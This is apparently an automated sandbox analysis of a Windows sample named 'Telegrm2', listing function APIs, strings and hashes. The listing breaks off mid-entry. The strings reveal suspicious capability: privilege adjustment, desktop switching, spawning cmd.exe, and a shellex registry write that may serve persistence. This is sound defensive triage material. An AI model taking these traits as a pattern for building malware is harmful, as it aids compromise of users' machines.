                                            Function 030A2DB0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 91libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                            • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                            • API String ID: 2887716753-2040270271
                                            • Opcode ID: 1931c1dd66fb4f11e5269d907c7bd64e2e974d974d3bc15fafe02a502647d804
                                            • Instruction ID: 48070200071a512e2452cd0f525bb60a86408ddc0efcad160bcdd0f18f3b3612
                                            • Opcode Fuzzy Hash: 1931c1dd66fb4f11e5269d907c7bd64e2e974d974d3bc15fafe02a502647d804
                                            • Instruction Fuzzy Hash: 19317021222B0595EB45DF66F86439A73A8F788FD1F446226EE4E43724DE7CC24AC748
                                            Function 030A3A90 Relevance: 34.7, APIs: 23, Instructions: 171sleepsynchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030A19A0: WSAStartup.WS2_32 ref: 030A1A19
                                              • Part of subcall function 030A19A0: CreateEventA.KERNEL32 ref: 030A1A2A
                                            • GetTickCount64.KERNEL32 ref: 030A3AEF
                                              • Part of subcall function 030A1BF0: ResetEvent.KERNEL32 ref: 030A1C2D
                                              • Part of subcall function 030A1BF0: timeGetTime.WINMM ref: 030A1C3F
                                              • Part of subcall function 030A1BF0: socket.WS2_32 ref: 030A1C66
                                            • Sleep.KERNEL32 ref: 030A3B4B
                                            • GetTickCount64.KERNEL32 ref: 030A3B57
                                            • setsockopt.WS2_32 ref: 030A3BB7
                                            • CancelIo.KERNEL32 ref: 030A3BC1
                                            • closesocket.WS2_32 ref: 030A3BD2
                                            • SetEvent.KERNEL32 ref: 030A3BDC
                                            • TerminateThread.KERNEL32 ref: 030A3C03
                                            • WaitForSingleObject.KERNEL32 ref: 030A3C13
                                            • CloseHandle.KERNEL32 ref: 030A3C20
                                            • Sleep.KERNEL32 ref: 030A3C2B
                                            • CloseHandle.KERNEL32 ref: 030A3C47
                                            • GetTickCount64.KERNEL32 ref: 030A3D40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Count64EventTick$CloseHandleSleep$CancelCreateObjectResetSingleStartupTerminateThreadTimeWaitclosesocketsetsockoptsockettime
                                            • String ID:
                                            • API String ID: 2857159816-0
                                            • Opcode ID: e0bb808789239b27c2fb32954f1c2b8c7abc73c886bd81da04e735f3dea09c66
                                            • Instruction ID: 2d0b48f6ca7d5197affc98017be1a496703932f3bccf06ae7255f6171efc8b61
                                            • Opcode Fuzzy Hash: e0bb808789239b27c2fb32954f1c2b8c7abc73c886bd81da04e735f3dea09c66
                                            • Instruction Fuzzy Hash: D571813A212B808AEB61DF69EC683DD3365F7C4764F149611DA5E07AA8CF39C649C304
                                            Function 030C1BD0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030C065C: RtlLookupFunctionEntry.KERNEL32 ref: 030C06D0
                                            • __GetUnwindTryBlock.LIBCMT ref: 030C1C34
                                            • __SetUnwindTryBlock.LIBCMT ref: 030C1C5B
                                              • Part of subcall function 030B581C: RaiseException.KERNEL32 ref: 030B5897
                                            • __GetUnwindTryBlock.LIBCMT ref: 030C1C65
                                            • _getptd.LIBCMT ref: 030C1CBB
                                            • _getptd.LIBCMT ref: 030C1CCE
                                            • _getptd.LIBCMT ref: 030C1CDA
                                            • _SetThrowImageBase.LIBCMT ref: 030C1CEE
                                            • _getptd.LIBCMT ref: 030C1D3E
                                            • _getptd.LIBCMT ref: 030C1D51
                                            • _getptd.LIBCMT ref: 030C1D5D
                                            • type_info::operator==.LIBCMT ref: 030C1DC4
                                            • std::exception::exception.LIBCMT ref: 030C1DFD
                                            • _getptd.LIBCMT ref: 030C2030
                                            • std::exception::exception.LIBCMT ref: 030C20A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
                                            • String ID: bad exception$csm$csm$csm
                                            • API String ID: 1639654010-820278400
                                            • Opcode ID: 3685c36a0a81d65115aa6131bdc666353982adc44fbed820a1e8a164d6e4792e
                                            • Instruction ID: 1d70500b928d90989ac0f47dfaf89ae0250a91a589c9c8aa08642744c9a14263
                                            • Opcode Fuzzy Hash: 3685c36a0a81d65115aa6131bdc666353982adc44fbed820a1e8a164d6e4792e
                                            • Instruction Fuzzy Hash: ABD1E13A7227818ADF68DF62D1503EE77A8F784B88F58452DDE894BB16CB34C166C740
                                            Function 02DD1588 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 493COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$BlockUnwind$std::exception::exception$BaseImageThrowtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 3798665358-393685449
                                            • Opcode ID: 3059d18893a6f2d6e099a0d3dd07f7d6103baa939f11c7274faf6686222187fe
                                            • Instruction ID: a15efb4a99fae8a335308016c1db5573a628a1433b1851f5004014775fce52a2
                                            • Opcode Fuzzy Hash: 3059d18893a6f2d6e099a0d3dd07f7d6103baa939f11c7274faf6686222187fe
                                            • Instruction Fuzzy Hash: 83E1D230618E099FCB18EFA8D4456ADB3E2FB98311F54426ED88AD3351DB34EC45CB92
                                            Function 030A2BA0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 86libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoad
                                            • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                            • API String ID: 2449869053-588083535
                                            • Opcode ID: d557bd2b9d25df6d8a29b5deac8a03b5bc3a892c2579fa6b7429a775bd7d3774
                                            • Instruction ID: b7f12d50fdab6e2edb9c1febd5e898297d19e75c94e617c7c4d01411d66f7bfe
                                            • Opcode Fuzzy Hash: d557bd2b9d25df6d8a29b5deac8a03b5bc3a892c2579fa6b7429a775bd7d3774
                                            • Instruction Fuzzy Hash: 9C314925226B4081EA52DB66F8643AA73A9FB88FC1F406621DD4E47724EF3DC246C344
                                            Function 030BDAB8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 192processsynchronizationCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CloseHandleProcess__doserrno_errno$CodeCreateErrorExitLastObjectSingleWait_invalid_parameter_noinfofree
                                            • String ID: cmd.exe
                                            • API String ID: 2975444996-723907552
                                            • Opcode ID: 8161564a1f8a825c9dfa6e7f5876e452b6adfd5ea8f2c386f854498b4603120c
                                            • Instruction ID: f746d73e072f18ea7dbf0bf3d2ac1c0f769bbce1fab3c07426cda2b24def6de6
                                            • Opcode Fuzzy Hash: 8161564a1f8a825c9dfa6e7f5876e452b6adfd5ea8f2c386f854498b4603120c
                                            • Instruction Fuzzy Hash: 8161CE36702B84C5EB25CF69E4907EDBBB8F7847A8F599256CE9A07794DB78C109C300
                                            Function 030B6228 Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __free_lconv_mon.LIBCMT ref: 030B6280
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBEC2
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBED4
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBEE6
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBEF8
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF0A
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF1C
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF2E
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF40
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF52
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF64
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF79
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBF8E
                                              • Part of subcall function 030BBEA4: free.LIBCMT ref: 030BBFA3
                                            • free.LIBCMT ref: 030B6274
                                              • Part of subcall function 030B3D28: HeapFree.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D3E
                                              • Part of subcall function 030B3D28: _errno.LIBCMT ref: 030B3D48
                                              • Part of subcall function 030B3D28: GetLastError.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D50
                                            • free.LIBCMT ref: 030B6296
                                            • __free_lconv_num.LIBCMT ref: 030B62A2
                                            • free.LIBCMT ref: 030B62AE
                                            • free.LIBCMT ref: 030B62BA
                                            • free.LIBCMT ref: 030B62DE
                                            • free.LIBCMT ref: 030B62F2
                                            • free.LIBCMT ref: 030B6301
                                            • free.LIBCMT ref: 030B630D
                                            • free.LIBCMT ref: 030B633A
                                            • free.LIBCMT ref: 030B6362
                                            • free.LIBCMT ref: 030B637C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                                            • String ID:
                                            • API String ID: 518839503-0
                                            • Opcode ID: f89b08a602bd188221ff95485cf3b454eeedc17a38e148cd72016b7f7625fde1
                                            • Instruction ID: 6a92ee736af989330aff7e03852a3e307788ba55c1d9a86d1145fd649d8ce008
                                            • Opcode Fuzzy Hash: f89b08a602bd188221ff95485cf3b454eeedc17a38e148cd72016b7f7625fde1
                                            • Instruction Fuzzy Hash: 0831043A603A8895EFA5DF62E8603ED63B4EB84F94F5C4471CA4D5B254CF79C081C321
                                            Function 030AF690 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B38A4: GetSystemTimeAsFileTime.KERNEL32 ref: 030B38B2
                                              • Part of subcall function 030B4238: _getptd.LIBCMT ref: 030B4240
                                            • rand.LIBCMT ref: 030AF6D0
                                              • Part of subcall function 030B4250: _getptd.LIBCMT ref: 030B4254
                                            • lstrlen.KERNEL32 ref: 030AF720
                                            • lstrlen.KERNEL32 ref: 030AF77A
                                            • lstrlen.KERNEL32 ref: 030AF7A0
                                            • RegOpenKeyExA.ADVAPI32 ref: 030AF82C
                                            • RegSetValueExA.ADVAPI32 ref: 030AF852
                                            • RegSetValueExA.ADVAPI32 ref: 030AF87F
                                            • RegCloseKey.ADVAPI32 ref: 030AF88A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: lstrlen$TimeValue_getptd$CloseFileOpenSystemrand
                                            • String ID: SOFTWARE\Classes\*\shellex$lpData$lpKey
                                            • API String ID: 2327618628-1449424764
                                            • Opcode ID: 6fefa3e0f27e92e261e78610eb2f0b5b05a25b5e559b816f2ad515e97bd44d41
                                            • Instruction ID: 80f42555559c3de477f7ac933f32b6d1f825b1204458d1bcf546baf21cd72fa3
                                            • Opcode Fuzzy Hash: 6fefa3e0f27e92e261e78610eb2f0b5b05a25b5e559b816f2ad515e97bd44d41
                                            • Instruction Fuzzy Hash: 1E51B476626B8182DB51DF29F45039EB7A4F7C5B84F446125EA8E4BB28DF3CC605CB04
                                            Function 02DD0DC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 150COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$CreateFrameInfo
                                            • String ID: csm
                                            • API String ID: 4181383844-1018135373
                                            • Opcode ID: e4da1030930dd4cd1c6f41b80cadd6d82696cf0c5265258ebbf79b655e0db643
                                            • Instruction ID: 27cd0ea1964552b90f5216eed29946c347a52cfd867310601063f3e7c1a077e4
                                            • Opcode Fuzzy Hash: e4da1030930dd4cd1c6f41b80cadd6d82696cf0c5265258ebbf79b655e0db643
                                            • Instruction Fuzzy Hash: 84415C70518F498FD7A4EF68A445BB9B3E1FB99311F60056EE08DC3651DB34E842CB92
                                            Function 030C140C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$CreateFrameInfo_amsg_exit
                                            • String ID: csm
                                            • API String ID: 2825728721-1018135373
                                            • Opcode ID: b744a46c3f07925a4c1d9e07649c4199bea843438af9a345598a3ae4d823d4d1
                                            • Instruction ID: 55b1c972a6d62c208239dd89f6b41351be1166b2838b915ac0e4a82af427db0c
                                            • Opcode Fuzzy Hash: b744a46c3f07925a4c1d9e07649c4199bea843438af9a345598a3ae4d823d4d1
                                            • Instruction Fuzzy Hash: 62414C3A216B85C2CA74EB12E4403AEB7B4F385BA4F554229DFAE0BB55DF38C165C700
                                            Function 030BF5D8 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 101574016-0
                                            • Opcode ID: 7d14622a02d1deca1b0cf0f52e4728e130eed0a94cc1818f4bd661abd7614ca9
                                            • Instruction ID: 1a8e873a21e9f4e3ec518b5560e0df77dc0b6e7edf865c32eee372da743bc00d
                                            • Opcode Fuzzy Hash: 7d14622a02d1deca1b0cf0f52e4728e130eed0a94cc1818f4bd661abd7614ca9
                                            • Instruction Fuzzy Hash: B791F62A713B4242EE65EB25AD503EAA7F8FB85BD8F1C8968CE594B754DF38C1518300
                                            Function 030A1AC0 Relevance: 16.6, APIs: 11, Instructions: 75sleepnetworkCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: FreeVirtual$CloseHandle$CleanupSleep
                                            • String ID:
                                            • API String ID: 21600312-0
                                            • Opcode ID: a304c84f429aa0dd12295d70942336703db784592340804cb05594c0d335fd55
                                            • Instruction ID: 01908d1f3988d918254d463ed94077d0cfec8e76bc13e3cff4c140031768f8c0
                                            • Opcode Fuzzy Hash: a304c84f429aa0dd12295d70942336703db784592340804cb05594c0d335fd55
                                            • Instruction Fuzzy Hash: 0131CA35223F1086EB99CF66E860728B3A9FF88F85F04A215CD4E42664DF38C155C714
                                            Function 02DB2F18 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 276COMMON
                                            Download Yara Rule
                                            APIs
                                            • _localtime64.LIBCMT ref: 02DB3134
                                              • Part of subcall function 02DC35D8: __getgmtimebuf.LIBCMT ref: 02DC35EA
                                              • Part of subcall function 02DC3620: _errno.LIBCMT ref: 02DC3658
                                              • Part of subcall function 02DC3620: _invalid_parameter_noinfo.LIBCMT ref: 02DC3664
                                              • Part of subcall function 02DC3620: _errno.LIBCMT ref: 02DC36D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$__getgmtimebuf_invalid_parameter_noinfo_localtime64
                                            • String ID: .dll$2$2$Adva$GetU$ameA$pi32$serN
                                            • API String ID: 1626460918-1620219524
                                            • Opcode ID: b48aaf5986291119d3ad09e467f6c811ae23191144642e74e6dd10f8516cbbca
                                            • Instruction ID: 89fe6cfdb88b3f7777377c34db872ff47aa138c9b548edd4377c1d16a6a0a6ac
                                            • Opcode Fuzzy Hash: b48aaf5986291119d3ad09e467f6c811ae23191144642e74e6dd10f8516cbbca
                                            • Instruction Fuzzy Hash: 14A1E331118A888BD766EF28D858BEA77E2FF54300F60422ED84BC72A1DF349A45CF41
                                            Function 030A2CF0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 46libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32 ref: 030A2D0C
                                            • GetProcAddress.KERNEL32 ref: 030A2D24
                                            • GetProcAddress.KERNEL32 ref: 030A2D37
                                            • GetProcAddress.KERNEL32 ref: 030A2D47
                                            • FreeLibrary.KERNEL32 ref: 030A2D85
                                              • Part of subcall function 030A2BA0: LoadLibraryA.KERNEL32 ref: 030A2BD6
                                              • Part of subcall function 030A2BA0: GetProcAddress.KERNEL32 ref: 030A2BEE
                                              • Part of subcall function 030A2BA0: GetProcAddress.KERNEL32 ref: 030A2C01
                                              • Part of subcall function 030A2BA0: GetProcAddress.KERNEL32 ref: 030A2C16
                                              • Part of subcall function 030A2BA0: GetProcAddress.KERNEL32 ref: 030A2C29
                                              • Part of subcall function 030A2BA0: LoadLibraryA.KERNEL32 ref: 030A2C39
                                              • Part of subcall function 030A2BA0: GetProcAddress.KERNEL32 ref: 030A2C51
                                              • Part of subcall function 030A2BA0: FreeLibrary.KERNEL32 ref: 030A2CA9
                                              • Part of subcall function 030A2BA0: FreeLibrary.KERNEL32 ref: 030A2CB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoad
                                            • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                            • API String ID: 2449869053-3711086354
                                            • Opcode ID: 510d16b2c1c99bb46a5f25ad315769a2d06fe4b01968ba76cc41fb940420ab36
                                            • Instruction ID: 8b984a53bc43bb6ffbb058b2b320dbd2909cef70a6d184a8ad349bb830d46c3d
                                            • Opcode Fuzzy Hash: 510d16b2c1c99bb46a5f25ad315769a2d06fe4b01968ba76cc41fb940420ab36
                                            • Instruction Fuzzy Hash: D8115E20327F5182EA45DB56B86436973A9BB89FC0F446135ED4E47B28EF3CC246C708
                                            Function 030BC5D0 Relevance: 15.3, APIs: 10, Instructions: 253COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$ErrorInfoLast
                                            • String ID:
                                            • API String ID: 189849726-0
                                            • Opcode ID: 7ef7c59d4cdee379523f997506ac42a09622ffe027a2966c5871e4b537e2320c
                                            • Instruction ID: 8e4bd4969e9f2dee8e8c5fd55102620a9ef1d0e1a673d84f8a2d913f5c1e7c1f
                                            • Opcode Fuzzy Hash: 7ef7c59d4cdee379523f997506ac42a09622ffe027a2966c5871e4b537e2320c
                                            • Instruction Fuzzy Hash: 23B1DC763067C086EB55CF2AE4543EEB7B8F789B84F88412ADA998B754DF39C101CB00
                                            Function 030BF104 Relevance: 15.2, APIs: 10, Instructions: 250COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030BF4AE), ref: 030BF1F7
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030BF4AE), ref: 030BF276
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030BF4AE), ref: 030BF31D
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,030BF4AE), ref: 030BF343
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Info
                                            • String ID:
                                            • API String ID: 1775632426-0
                                            • Opcode ID: 26888acbc348ab8666a303c8cd225edcc6507e4fabdc7a1ae7975c0da1b757e8
                                            • Instruction ID: ddd8c6639e5d149f382482d8dc04d2909cbf1827b30747e4f8812d88b12a9a62
                                            • Opcode Fuzzy Hash: 26888acbc348ab8666a303c8cd225edcc6507e4fabdc7a1ae7975c0da1b757e8
                                            • Instruction Fuzzy Hash: 6D91E3667067825ADB61CF29DC103EA6BF6F781BA4F4C8E26DE6957784DB34C544C300
                                            Function 030BA690 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,030BA9CD), ref: 030BA72A
                                            • malloc.LIBCMT ref: 030BA793
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,030BA9CD), ref: 030BA7C7
                                            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,030BA9CD), ref: 030BA7EE
                                            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,030BA9CD), ref: 030BA836
                                            • malloc.LIBCMT ref: 030BA893
                                              • Part of subcall function 030B5728: _FF_MSGBANNER.LIBCMT ref: 030B5758
                                              • Part of subcall function 030B5728: RtlAllocateHeap.NTDLL ref: 030B577D
                                              • Part of subcall function 030B5728: _callnewh.LIBCMT ref: 030B5796
                                              • Part of subcall function 030B5728: _errno.LIBCMT ref: 030B57A1
                                              • Part of subcall function 030B5728: _errno.LIBCMT ref: 030B57AC
                                            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,030BA9CD), ref: 030BA8C8
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,030BA9CD), ref: 030BA908
                                            • free.LIBCMT ref: 030BA91C
                                            • free.LIBCMT ref: 030BA92D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocateHeap_callnewh
                                            • String ID:
                                            • API String ID: 1390791636-0
                                            • Opcode ID: fddf527eb4bc61e1eb6e059559d9a4a9f6be8eebb6d9ab39011d57d2ca33efdc
                                            • Instruction ID: c502437ca5d6817b29c7183592ce33dfcc1b1c46f53201de5ef98e78cf2c2812
                                            • Opcode Fuzzy Hash: fddf527eb4bc61e1eb6e059559d9a4a9f6be8eebb6d9ab39011d57d2ca33efdc
                                            • Instruction Fuzzy Hash: 4371C236306B8096DB25CF69E8403DAB7F9FB88BE8F584626DA5D57B94DB38C1418700
                                            Function 030AE280 Relevance: 15.1, APIs: 10, Instructions: 121synchronizationsleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030A19A0: WSAStartup.WS2_32 ref: 030A1A19
                                              • Part of subcall function 030A19A0: CreateEventA.KERNEL32 ref: 030A1A2A
                                              • Part of subcall function 030A1BF0: ResetEvent.KERNEL32 ref: 030A1C2D
                                              • Part of subcall function 030A1BF0: timeGetTime.WINMM ref: 030A1C3F
